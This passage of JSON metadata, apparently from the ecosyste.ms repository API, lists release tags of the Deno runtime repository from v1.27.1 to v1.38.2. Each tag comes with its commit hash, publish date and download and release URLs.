epositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.